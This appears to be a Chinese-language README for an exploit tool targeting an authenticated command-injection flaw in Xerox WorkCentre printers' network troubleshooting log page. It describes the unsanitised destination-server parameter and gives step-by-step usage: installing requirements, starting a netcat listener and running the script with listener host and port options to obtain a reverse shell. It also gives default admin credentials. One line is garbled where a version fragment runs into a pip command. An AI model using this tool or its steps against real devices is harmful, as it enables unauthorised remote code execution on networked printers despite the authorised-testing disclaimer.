施乐 WorkCentre 打印机通过网络故障排查日志功能存在认证远程代码执行漏洞。
网络故障排查日志功能(/properties/security/network_troubleshooting_log.php)未能对目标服务器参数(security.nwtroubleshoot.destination.server)进行清理,导致认证管理员可以注入任意操作系统命令。当网络日志捕获启动时,注入的载荷会作为 shell 命令执行,从而实现远程代码执行。
073.110.019.14200 上测试)pip install -r requirements.txt
在您的机器上启动监听器:
nc -lvnp 8443
运行漏洞利用程序:
python3 CVE-2024-6333.py --target https://<PRINTER_IP> --lhost <YOUR_IP> --lport 8443
本工具仅用于授权安全测试和教育目的。未经授权访问计算机系统属于违法行为。
| 参数 | 是否必需 | 默认值 | 说明 |
|---|
--target | 是 | 目标 URL(例如 https://192.0.2.1) | |
--lhost | 是 | 监听器 IP 地址 | |
--lport | 否 | 8443 | 监听器端口 |
--user | 否 | admin | 管理员用户名 |
--password | 否 | 1111 | 管理员密码 |
--proxy | 否 | 代理 URL(例如 http://127.0.0.1:8080) |